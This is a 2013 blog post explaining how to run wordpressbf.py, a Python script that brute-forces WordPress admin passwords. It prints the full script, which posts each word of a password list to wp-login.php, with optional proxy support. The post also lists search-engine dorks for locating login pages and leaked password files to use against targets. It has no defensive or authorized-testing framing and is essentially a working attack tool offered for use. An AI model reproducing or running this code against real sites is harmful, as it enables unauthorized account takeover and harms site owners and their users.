» » Bruteforce wordpressbf.py, how to use Bruteforce wordpressbf.py on backtrack 5

Saturday, January 19, 2013

Bruteforce wordpressbf.py, how to use Bruteforce wordpressbf.py on backtrack 5


brutewp

WordPressbf.py is a python program that serves to make bruteforce password on wordpress login page. The ability of this program lies in the source list of passwords that takes a function of Loaded Words that exist in this program.

How Uses

Test by Kng
dork target :               inurl:/wp-login.php
dork password:        inurl:/passwords.txt

–syntax

python wordpressbf.py http://target.com/wp-login.php admin passlistente.txt -v
brutewp1
view sourceprint?
001#!/usr/bin/python
002#WordPress Brute Force (wp-login.php)
003
004#If cookies enabled brute force will not work (yet)
005#Change response on line 97 if needed. (language)
006
007#Dork: inurl:wp-login.php
008
009#http://www.darkc0de.com
010#d3hydr8[at]gmail[dot]com
011
012import urllib2, sys, re, urllib, httplib, socket
013
014print "\n   d3hydr8[at]gmail[dot]com WordPressBF v1.0"
015print "----------------------------------------------"
016
017if len(sys.argv) not in [4,5,6,7]:
018    print "Usage: ./wordpressbf.py <site> <user> <wordlist> <options>\n"
019    print "\t   -p/-proxy <host:port> : Add proxy support"
020    print "\t   -v/-verbose : Verbose Mode\n"
021    sys.exit(1)
022
023for arg in sys.argv[1:]:
024    if arg.lower() == "-p" or arg.lower() == "-proxy":
025        proxy = sys.argv[int(sys.argv[1:].index(arg))+2]
026    if arg.lower() == "-v" or arg.lower() == "-verbose":
027        verbose = 1
028
029try:
030    if proxy:
031        print "\n[+] Testing Proxy..."
032        h2 = httplib.HTTPConnection(proxy)
033        h2.connect()
034        print "[+] Proxy:",proxy
035except(socket.timeout):
036    print "\n[-] Proxy Timed Out"
037    proxy = 0
038    pass
039except(NameError):
040    print "\n[-] Proxy Not Given"
041    proxy = 0
042    pass
043except:
044    print "\n[-] Proxy Failed"
045    proxy = 0
046    pass
047
048try:
049    if verbose == 1:
050        print "[+] Verbose Mode On\n"
051except(NameError):
052    print "[-] Verbose Mode Off\n"
053    verbose = 0
054    pass
055
056if sys.argv[1][:7] != "http://":
057    host = "http://"+sys.argv[1]
058else:
059    host = sys.argv[1]
060
061print "[+] BruteForcing:",host
062print "[+] User:",sys.argv[2]
063
064try:
065    words = open(sys.argv[3], "r").readlines()
066    print "[+] Words Loaded:",len(words),"\n"
067except(IOError):
068    print "[-] Error: Check your wordlist path\n"
069    sys.exit(1)
070
071for word in words:
072    word = word.replace("\r","").replace("\n","")
073    login_form_seq = [
074        ('log', sys.argv[2]),
075        ('pwd', word),
076        ('rememberme', 'forever'),
077        ('wp-submit', 'Login >>'),
078        ('redirect_to', 'wp-admin/')]
079    login_form_data = urllib.urlencode(login_form_seq)
080    if proxy != 0:
081        proxy_handler = urllib2.ProxyHandler({'http': 'http://'+proxy+'/'})
082        opener = urllib2.build_opener(proxy_handler)
083    else:
084        opener = urllib2.build_opener()
085    try:
086        site = opener.open(host, login_form_data).read()
087    except(urllib2.URLError), msg:
088        print msg
089        site = ""
090        pass
091
092    if re.search("WordPress requires Cookies",site):
093        print "[-] Failed: WordPress has cookies enabled\n"
094        sys.exit(1)
095
096    #Change this response if different. (language)
097    if re.search("<strong>ERROR</strong>",site) and verbose == 1:
098        print "[-] Login Failed:",word
099    else:
100        print "\n\t[!] Login Successfull:",sys.argv[2],word,"\n"
101        sys.exit(1)
102print "\n[-] Brute Complete\n"



Recent Posts

Posted by at
Labels: